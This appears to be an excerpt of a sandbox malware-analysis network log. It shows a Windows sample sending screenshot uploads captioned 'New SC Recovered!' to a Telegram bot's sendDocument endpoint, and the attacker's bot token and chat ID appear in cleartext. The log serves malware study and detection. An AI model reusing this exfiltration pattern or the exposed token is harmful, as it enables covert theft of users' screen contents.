2024-07-25 22:03:05 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:03:05 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:03:05 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:03:05 UTC	10792	OUT	Data Raw: e0 85 14 f8 61 92 77 d9 12 16 6c 67 02 a6 fe ce bb 3f f2 c4 fe 62 b2 9d 6a 70 76 9c 92 f5 66 b0 a3 56 6a f0 8b 6b c9 15 a8 ab 7f d9 b7 a7 fe 58 1f cc 53 65 b0 bb 86 33 24 90 95 41 d4 e4 54 ac 45 16 ec a6 be f4 53 c3 d6 4a ee 0f ee 65 6a 28 a2 b7 30 0a 28 a2 80 0a 28 a2 80 0a 2b 6e 2f 0d 5c cb 12 48 b3 c4 03 a8 61 9c f7 fc 29 df f0 8b dd ff 00 cf 78 7f 5f f0 ae 5f ad d1 ef f9 9d df d9 f8 9f e5 fc 57 f9 98 54 56 d4 be 1b ba 8a 27 90 cf 09 08 a5 8e 33 db f0 ac bb bb 59 6c e7 68 65 5c 11 d0 f6 23 d6 b4 85 7a 75 1d a2 cc aa e1 2b 52 8f 34 e3 64 43 45 14 56 c7 30 51 45 14 00 51 45 14 00 52 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 29 28 a0 05 a4 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 06 25 14 b4 94 00 b4 94 66 8a 00 29 33 45 14 Data Ascii: awlg?bjpvfVjkXSe3$ATESJej(0((+n/\Ha)x__WTV'3Ylhe\#zu+R4dCEV0QEQERQE((()((((((%f)3E
2024-07-25 22:03:05 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 37 39 64 33 34 38 32 37 30 32 2d 2d 0d 0a Data Ascii: -----------------------------8dd1279d3482702--
2024-07-25 22:03:06 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:03:06 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49754	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:03:07 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd14f0e836a8c1 Host: api.telegram.org Content-Length: 57561 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:03:08 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:03:08 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 66 30 65 38 33 36 61 38 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 66 30 65 38 33 36 61 38 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 35 2f 32 30 32 34 20 30 35 3a 35 31 3a 34 32 0a 55 73 65 72 Data Ascii: -----------------------------8dd14f0e836a8c1Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd14f0e836a8c1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/05/2024 05:51:42User
2024-07-25 22:03:08 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:03:08 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:03:08 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:03:08 UTC	7422	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:03:08 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 66 30 65 38 33 36 61 38 63 31 2d 2d 0d 0a Data Ascii: -----------------------------8dd14f0e836a8c1--
2024-07-25 22:03:08 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:03:08 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49755	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:03:12 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd183344abb936 Host: api.telegram.org Content-Length: 57561 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:03:12 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-25 22:03:12 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 38 33 33 34 34 61 62 62 39 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 38 33 33 34 34 61 62 62 39 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 39 2f 32 30 32 34 20 30 39 3a 32 34 3a 32 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd183344abb936Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd183344abb936Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/09/2024 09:24:23User
2024-07-25 22:03:12 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:03:12 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
2024-07-25 22:03:12 UTC	16355	OUT	Data Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14 Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV\|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
2024-07-25 22:03:12 UTC	7422	OUT	Data Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28 Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
2024-07-25 22:03:12 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 38 33 33 34 34 61 62 62 39 33 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd183344abb936--
2024-07-25 22:03:13 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 25 Jul 2024 22:03:13 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	49756	149.154.167.220	443	5020	C:\Users\user\Desktop\LisectAVT_2403002A_127.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:03:16 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd1ad724ca83fa Host: api.telegram.org Content-Length: 57561 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.6	49757	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-07-25 22:03:17 UTC	262	OUT	POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dcacd40e7a0308 Host: api.telegram.org Content-Length: 57561 Expect: 100-continue Connection: Keep-Alive
2024-07-25 22:03:17 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 64 34 30 65 37 61 30 33 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 64 34 30 65 37 61 30 33 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 35 2f 32 30 32 34 20 31 38 3a 30 33 3a 31 35 0a 55 73 65 72 Data Ascii: -----------------------------8dcacd40e7a0308Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcacd40e7a0308Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/25/2024 18:03:15User
2024-07-25 22:03:17 UTC	16355	OUT	Data Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
2024-07-25 22:03:17 UTC	16355	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE 